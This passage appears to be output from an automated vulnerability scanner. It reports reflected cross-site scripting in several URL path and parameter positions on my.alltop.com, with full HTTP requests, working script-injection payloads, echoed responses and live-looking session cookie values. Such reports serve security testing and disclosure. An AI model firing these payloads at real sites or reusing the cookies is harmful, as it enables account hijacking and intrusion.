1.137. http://my.alltop.com/alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5430b"><script>alert(1)</script>c9395a1a119 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/h'%22--%3E%3C/style%3E%3C5430b"><script>alert(1)</script>c9395a1a119/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:47 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:48 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:48 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/h'%22--%3E%3C/style%3E%3C5430b"><script>alert(1)</script>c9395a1a119/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.138. http://my.alltop.com/alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9915b"><script>alert(1)</script>081dc73b5e3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C9915b"><script>alert(1)</script>081dc73b5e3/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:50 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:53 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:53 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C9915b"><script>alert(1)</script>081dc73b5e3/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.139. http://my.alltop.com/alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c637f"><script>alert(1)</script>c765f498bc2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3Ec637f"><script>alert(1)</script>c765f498bc2 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:53 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:54 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:54 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3Ec637f"><script>alert(1)</script>c765f498bc2" method="post" accept-charset="utf-8">
...[SNIP]...

1.140. http://my.alltop.com/alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c84bb"><script>alert(1)</script>6624dab7d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E?c84bb"><script>alert(1)</script>6624dab7d0=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:41 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:42 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:42 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E?c84bb"><script>alert(1)</script>6624dab7d0=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.141. http://my.alltop.com/alpha/h/%22ns=%22netsparker(0x0001B3) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h/%22ns=%22netsparker(0x0001B3)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7090"><script>alert(1)</script>4080506e10f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/hd7090"><script>alert(1)</script>4080506e10f/%22ns=%22netsparker(0x0001B3) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:47 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:48 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:48 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/hd7090"><script>alert(1)</script>4080506e10f/%22ns=%22netsparker(0x0001B3)" method="post" accept-charset="utf-8">
...[SNIP]...

1.142. http://my.alltop.com/alpha/h/%22ns=%22netsparker(0x0001B3) [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h/%22ns=%22netsparker(0x0001B3)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 873d0"><script>alert(1)</script>0d24925d5e5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/h/%22ns873d0"><script>alert(1)</script>0d24925d5e5=%22netsparker(0x0001B3) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:50 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:52 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:52 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/h/%22ns873d0"><script>alert(1)</script>0d24925d5e5=%22netsparker(0x0001B3)" method="post" accept-charset="utf-8">
...[SNIP]...

1.143. http://my.alltop.com/alpha/h/%22ns=%22netsparker(0x0001B3) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h/%22ns=%22netsparker(0x0001B3)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f80a"><script>alert(1)</script>c983759053d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/h/%22ns=%22netsparker(0x0001B3)?6f80a"><script>alert(1)</script>c983759053d=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:45 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:46 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:46 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/h/%22ns=%22netsparker(0x0001B3)?6f80a"><script>alert(1)</script>c983759053d=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.144. http://my.alltop.com/alpha/h/%2522ns%253D%2522netsparker%25280x0001B8%2529) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h/%2522ns%253D%2522netsparker%25280x0001B8%2529)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ca05"><script>alert(1)</script>359e354c8be was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/h7ca05"><script>alert(1)</script>359e354c8be/%2522ns%253D%2522netsparker%25280x0001B8%2529) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:46 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:48 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:48 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
